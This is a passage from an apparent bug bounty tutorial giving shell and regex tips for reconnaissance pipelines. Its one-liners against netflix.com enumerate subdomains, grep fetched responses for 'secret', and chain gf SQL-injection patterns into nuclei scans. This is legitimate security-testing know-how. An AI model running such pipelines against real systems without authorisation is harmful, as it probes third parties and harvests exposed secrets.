uro before everything. Before feeding URLs into any tool that makes HTTP requests, run them through uro . Reducing 50,000 URLs to 5,000 unique patterns saves time, reduces noise, and avoids hitting rate limits.

httpx -mc 200 for precision. When you only care about live, accessible endpoints, filter with -mc 200 (match status code 200). This eliminates redirects, 403s, and 404s from your working set.

sort -u is free deduplication. Always sort and deduplicate before feeding data into tools. It costs almost nothing and prevents redundant work downstream.

tee for simultaneous write and pipe. When you want to save output AND pipe it to the next command:

subfinder -d netflix.com | tee subs.txt | httpx -silent

This writes to subs.txt while simultaneously piping to httpx no need to run subfinder twice.

xargs -P10 for parallelism. Most recon tasks are I/O bound, not CPU bound. Running 10 parallel curl requests is almost always faster than running them sequentially. Adjust the number based on the target's rate limiting.

2>/dev/null to silence errors. In long pipelines, tool errors printed to stderr can clutter your output. Redirect stderr to /dev/null for cleaner results:

cat urls.txt | while read url; do curl -sk "$url" 2>/dev/null | grep 'secret'; done

while read for complex per-URL logic. When you need to do multiple operations per URL (extract a parameter, make a request, check the response), a while read loop is cleaner than chaining pipes:

cat urls.txt | while read url; do
 # Multiple operations on $url
 done

grep -v to exclude noise. CDN URLs, analytics scripts, and tracking pixels pollute your URL lists. Filter them out early:

cat urls.txt | grep -vE '(google-analytics|doubleclick|facebook|twitter|cdn\.cloudflare|jquery\.min\.js)'

Scope your regex to the target. When extracting subdomains, always anchor to the target domain to avoid false positives from unrelated certificates:

grep -oP '[a-zA-Z0–9._-]+\.netflix\.com'

Chain nuclei after gf. The gf patterns give you candidate URLs; nuclei gives you confirmed findings. The combination is powerful:

cat urls.txt | gf sqli | nuclei -t ~/nuclei-templates/vulnerabilities/ -silent

Conclusion

Regex is not optional in modern bug bounty hunting. It is the difference between staring at 50,000 lines of tool output and having a focused list of 20 URLs worth testing manually. Every hour you invest in learning regex pays dividends across every engagement you'll ever run.

The pipelines in this article are starting points, not endpoints. The best hunters customize their gf patterns for the specific technologies they encounter. They build target-specific wordlists from the URL patterns they find. They write scripts that automate the boring parts so they can spend their time on the interesting parts: the manual analysis, the creative chaining of vulnerabilities, the business logic flaws that no automated tool will ever find.

Build your pipeline. Customize your patterns. Automate the noise. Focus on the signal.

Happy hunting. Stay in scope.